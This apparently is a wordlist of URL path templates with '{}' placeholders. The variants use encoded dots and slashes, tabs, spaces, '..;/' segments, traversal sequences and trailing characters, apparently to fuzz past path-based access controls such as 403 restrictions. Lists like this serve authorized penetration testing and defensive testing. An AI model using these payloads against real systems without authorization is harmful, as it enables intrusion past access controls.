{}/{}
{}/{}/
{}/{}#
{}/{}//
{}/{}///
{}//{}
{}//{}//
{}/%2f/{}
{}/%2f/{}/
{}/{}/*
{}/{}/*/
{}/%2e/{}
{}/%2e/{}/
{}/%2e//{}
{}/%2e//{}/
{}/./{}
{}/./{}/
{}/.//{}
{}/.//{}/
{}/{}/.
{}/{}/./
{}/./{}/.
{}/./{}/./
{}/{}%09
{}/{}%09/
{}/{}%20
{}/{}%20/
{}/%20{}%20
{}/%20{}%20/
{}/{}/..;/
{}/{}..;/
{}/{}/../
{}/{}/....//
{}/{}/..\\
{}/{}/....\\\\
{}/test../{}
{}/test../{}/
{}/test/../{}
{}/test/../{}/
{}/{}?
{}/{}??
{}/{}???
{}/{}/.[random_string]
{}/{}/.[file_extension]
{}/{}.[random_string]
{}/{}.[file_extension]
{}/{}/?[param]
